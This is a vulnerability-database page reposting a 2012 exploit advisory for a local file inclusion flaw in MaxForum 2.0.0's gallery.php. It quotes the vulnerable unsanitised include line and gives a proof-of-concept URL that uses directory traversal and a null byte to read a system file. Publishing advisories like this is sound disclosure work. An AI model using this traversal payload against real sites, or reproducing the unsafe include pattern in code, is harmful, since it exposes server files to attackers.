Lucene search

MaxForum 2.0.0 Local File Inclusion

🗓️ 26 Sep 2012 00:00:00Reported by L0n3ly-H34rTType

packetstorm🔗 packetstormsecurity.com👁 27 Views

MaxForum 2.0.0 Local File Inclusion Vulnerability affecting gallery.ph

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`############################################  
### Exploit Title: MaxForum v2.0.0 Local File Inclusion Vulnerability  
### Date: 25/09/2012   
### Author: L0n3ly-H34rT   
### Contact: [email protected]   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://www.max4dev.com/demo/ar/  
### Software Link: http://sourceforge.net/projects/maxforum/files/2.0.0/Max_v2.0.0.zip/download  
### Version : 2.0.0 ( may be old version is affect! i don't check )  
### Tested on: Linux/Windows   
############################################  
  
# Affected file ( includes/pages/gallery.php ) on line 42 :  
  
include 'gallery/' . $_GET['act'] . '.php';  
  
# P.O.C :  
  
http://127.0.0.1/max2/index.php?act=../../../../../../../boot.ini%00&page=gallery  
  
############################################  
  
# Note :  
  
Must be magic_quotes_gpc = Off  
  
# Greetz to my friendz  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

26 Sep 2012 00:00Current

7.4High risk

Vulners AI Score7.4